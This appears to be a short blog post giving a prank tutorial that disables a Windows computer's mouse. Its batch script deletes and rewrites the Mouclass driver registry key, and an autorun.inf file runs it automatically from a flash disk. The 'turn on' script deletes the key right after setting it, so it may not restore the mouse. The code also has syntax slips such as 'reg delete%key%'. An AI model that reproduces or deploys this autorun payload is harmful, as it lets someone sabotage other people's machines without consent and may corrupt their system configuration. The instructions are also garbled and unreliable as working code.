Turn off the mouse
1. Open notepad
2. Type
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Service\Mouclass"
reg delete%key%
reg add%key%/v Start /t REG_DWORD/d 4
3. Save as mousehack.bat(you can change the name"mousehack")
4. Open new notepad
5.Type
[autorun]
Open=mousehack.bat
Action=Mouse Disable
6.Save as autorun.inf
7. Move file mousehack.bat and autorun.inf to flashdisk
8.And everytime you use that flashdisk, your mouse will turn off
Turn on Mouse
1. Open new notepad
2. Type
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Service\Mouclass"
reg add%key%/v Start /t REG_DWORD/d1
reg delete%key%
3.Save as .bat
Enjoy
No comments:
Post a Comment